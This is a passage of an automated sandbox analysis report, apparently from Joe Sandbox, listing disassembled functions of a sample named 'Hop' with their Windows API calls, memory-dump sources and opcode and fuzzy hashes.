                                                                                                                                                                                                                                                                                                          • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                                                          • API String ID: 2280078643-1018135373
                                                                                                                                                                                                                                                                                                          • Opcode ID: f6c1382f695be2b80eeb360de390ec25b85b68791ec0bc773e7ce0cc61abff03
                                                                                                                                                                                                                                                                                                          • Instruction ID: ed23487464da558586cdac8320871d2b8fce18cca4dc4ffbf2c3adb09146ba1a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6c1382f695be2b80eeb360de390ec25b85b68791ec0bc773e7ce0cc61abff03
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02211C76A08641C7E730DB12E0402AE7760FB94B68F004629DE9D47BD5CF3DE886CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4A38DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 2574300362-192647395
                                                                                                                                                                                                                                                                                                          • Opcode ID: b441bd5978eb2b7f425b1bf27e1c65cb3c7479a7c4568158e328b2615627030f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 23aa3827e5a6492c799a88fcc4d5f4e70b2f704aa76c457a91d68e2c4b0b8de4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b441bd5978eb2b7f425b1bf27e1c65cb3c7479a7c4568158e328b2615627030f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70E0C265A06B0AC2EB14CB60A45436823A4BF48B68F850438D91D96394EFBCE6E9C340
                                                                                                                                                                                                                                                                                                          Function 00007FF68C43720C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 2574300362-3689287502
                                                                                                                                                                                                                                                                                                          • Opcode ID: 849496fe8f7c3fa53244a860dec0166c597485a1e7ca8ffba036c0d989768c29
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6a41e4f47a06a1ba5d83d4824aab679f960d2bc8983af7543120f9b09a75fb5f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 849496fe8f7c3fa53244a860dec0166c597485a1e7ca8ffba036c0d989768c29
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DE0E565A06B0AC2EF14CB61E41436823E0FF58B6CF540438D95D86398EFBCE6E5C740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4371C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 2574300362-1355242751
                                                                                                                                                                                                                                                                                                          • Opcode ID: 935ee8e5b0afee5f2a3e8b61c9fff60d84134b50b40d875a31bd5a84aed26f6b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 696d4d78ec77ca6a202dfab344270901f690cf0bc16607d70e4e78c8392e3faf
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 935ee8e5b0afee5f2a3e8b61c9fff60d84134b50b40d875a31bd5a84aed26f6b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFE0E566A06B06C2EF14CB60E41437823A0FF48B6CF940539C95D86394EFBCE6E5C340
                                                                                                                                                                                                                                                                                                          Function 00007FF68C49BDC8 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8ea6f4ac70786459caae908e23c7b1e170f2c83987f10f6455c2ac2cf614949c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7e31c2fd049b86221943faebaa3fc880194df4a5c85a08bc5a2b30119cc87452
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ea6f4ac70786459caae908e23c7b1e170f2c83987f10f6455c2ac2cf614949c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0D1F876B04A65C6EB14CF66C9502AD37B1FB88F88B114426DF4E87B68DF39D888C744
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4C8334 Relevance: 6.3, APIs: 4, Instructions: 282COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: fc57336e55be4d4a0414789caafff31700b7c62f52e3843f0ecb10163a0943b0
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3cc2ee56ec0a4b710ed6729019ea22933953de142820c80fd16811e696b4f83d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc57336e55be4d4a0414789caafff31700b7c62f52e3843f0ecb10163a0943b0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CD10466B05A41DAEB10DF65D4801AC33B5FF94B8CB40443ADE0D97BAADF38E569C380
                                                                                                                                                                                                                                                                                                          Function 00007FF68C439D70 Relevance: 6.2, APIs: 4, Instructions: 247fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00007FF68C43475D,?,?,?,00007FF68C438FCF,?,?,?,?,?,?,?,00007FF68C439D60), ref: 00007FF68C439F34
                                                                                                                                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,00007FF68C43475D,?,?,?,00007FF68C438FCF,?,?,?,?,?,?,?,00007FF68C439D60), ref: 00007FF68C47D886
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$PointerRead
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3154509469-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3201254c23c442e17564adbb3e46d8ade15d1a5368ec0c22c80302ae78d27f32
                                                                                                                                                                                                                                                                                                          • Instruction ID: fc7d7781233654fb06eddc33a35cebefae4e981bce12c2c349270c986a5b1f5b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3201254c23c442e17564adbb3e46d8ade15d1a5368ec0c22c80302ae78d27f32
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDB1AA72A08A46C6EB21CB25E454639B3A0FF94B98F118639DA9E837D4DF3DE4C1D700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DF778 Relevance: 6.1, APIs: 4, Instructions: 107windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: bf09fe5937f6b34ddc429ee35f9a2399ceb717e99e565ce14bad0b4b6f8036fa
                                                                                                                                                                                                                                                                                                          • Instruction ID: cb0d0ebf5794c47f1b77e4908fcee8a4f881714cdde7c8b1e02ca0636e5e29dd
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf09fe5937f6b34ddc429ee35f9a2399ceb717e99e565ce14bad0b4b6f8036fa
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B412C32A05A46C5EB209F19E85457967A0FF88B98F55413AEA5D836A0DF38E4C5C301
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DB278 Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3076010158-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6ffcaf284c61e2dc411bcc38c084d1ebc1702a088337431afa78768ad14ccc95
                                                                                                                                                                                                                                                                                                          • Instruction ID: b92e65278c691901637e7b67efcf79824910d9096c92bd82e30cb06163351ce5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ffcaf284c61e2dc411bcc38c084d1ebc1702a088337431afa78768ad14ccc95
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F413936A04A85CAEB54DF66D4405AD37A0FB48B98F55403ADF0D93B54CF38E899D740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C46C5BC Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4141327611-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e3b76c81e184928a19d82946b11eb0fa6c3ced191be995ebd8011999c3bc7ce9
                                                                                                                                                                                                                                                                                                          • Instruction ID: 06d006643b6302108292c22f45398d55523c445d97b857cc6deb8e79a9090c73
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3b76c81e184928a19d82946b11eb0fa6c3ced191be995ebd8011999c3bc7ce9
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F41C371A08B82C6FB659E119840B7966A0FF80BA8F145138DB9D87ACDDF2CD881C705
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DCDF8 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3340791633-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8534e56cbfa9c923cdf90f1edd83f1c731ffea0719ea79c7905dbe4df23172ef
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9d29e4b6bb932186c7786736d021423c9446e8cd7d3e8d7790bee206bfe75ec2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8534e56cbfa9c923cdf90f1edd83f1c731ffea0719ea79c7905dbe4df23172ef
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 944156B1A49546C6FB64AB2594443B877A1BF85BD8F68413ADB1E836E1CE3CE9C1C301
                                                                                                                                                                                                                                                                                                          Function 00007FF68C473C28 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF68C46A02B,?,?,?,00007FF68C469FE6), ref: 00007FF68C473C41
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF68C46A02B,?,?,?,00007FF68C469FE6), ref: 00007FF68C473CA3
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF68C46A02B,?,?,?,00007FF68C469FE6), ref: 00007FF68C473CDD
                                                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF68C46A02B,?,?,?,00007FF68C469FE6), ref: 00007FF68C473D07
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1557788787-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 74fb27ec21b7c3bf82c39238e5a02448a96be849278828ef460b116f9bff67e0
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8730b887e2d8c183b2d034ef1b5dc7934d63f31567293258dea56414621e7255
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74fb27ec21b7c3bf82c39238e5a02448a96be849278828ef460b116f9bff67e0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A321A732F48B95C5E6209F16A440029B6A4FF84FD4F498139EE8EA3B94DF3CD491D300
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4E180C Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF68C432794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF68C47A57D), ref: 00007FF68C4327B1
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32 ref: 00007FF68C4E1861
                                                                                                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32 ref: 00007FF68C4E1885
                                                                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?,?,00000000,?,?,00007FF68C47A35D,?,?,?,?,?,?,?,?,?,00007FF68C4324CF), ref: 00007FF68C4E18CC
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,?,00000000,?,?,00007FF68C47A35D,?,?,?,?,?,?,?,?,?,00007FF68C4324CF), ref: 00007FF68C4E1910
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
